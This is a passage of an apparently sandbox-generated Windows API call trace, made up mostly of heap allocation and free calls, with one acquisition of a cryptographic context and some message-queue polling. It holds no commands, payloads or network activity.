hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0268.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0268.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0268.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0268.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0268.758] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0268.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0268.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ba8 [0268.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0268.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0268.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0268.759] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0268.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0268.759] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0268.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0268.762] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0268.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0268.763] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0268.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0268.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.764] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.764] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0268.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0268.765] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0268.765] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.765] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.765] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: 